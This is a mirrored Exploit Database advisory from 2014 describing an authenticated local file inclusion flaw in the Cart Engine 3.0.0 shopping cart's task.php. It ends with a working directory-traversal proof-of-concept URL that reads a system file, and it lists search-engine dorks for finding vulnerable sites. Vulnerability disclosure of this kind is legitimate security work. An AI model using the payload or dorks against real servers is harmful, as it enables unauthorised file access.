Cart Engine 3.0.0 – ‘task.php’ Local File Inclusion

• Exploit Database
• 10 阅读

• 作者： LiquidWorm
  日期： 2014-03-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/32504/

• 
  Cart Engine 3.0.0 (task.php) Local File Inclusion Vulnerability
  
  
  Vendor: C97net
  Product web page: http://www.c97.net
  Affected version: 3.0.0
  
  Summary: Open your own online shop today with Cart Engine! The
  small, yet powerful and don't forget, FREE shopping cart based
  on PHP & MySQL. Unique features of Cart Engine include: CMS engine
  based on our qEngine, product options, custom fields, digital
  products, search engine friendly URL, user friendly administration
  control panel, easy to use custom fields, module expandable, sub
  products, unsurpassed flexibility...and more!
  
  Desc: Cart Engine suffers from an authenticated file inclusion
  vulnerability (LFI) when input passed thru the 'run' parameter to
  task.php is not properly verified before being used to include files.
  This can be exploited to include files from local resources with
  directory traversal attacks.
  
  
  Tested on: Apache/2.4.7 (Win32)
   PHP/5.5.6
   MySQL 5.6.14
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2014-5181
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5181.php
  
  
  Dork #1: intitle:powered by c97.net
  Dork #2: intitle:powered by qEngine
  Dork #3: intitle:powered by Kemana.c97.net
  Dork #4: intitle:powered by Cart2.c97.net
  
  
  
  07.03.2014
  
  ---
  
  
  http://localhost/ce3_0/admin/task.php?run=../../../../../../windows/win.ini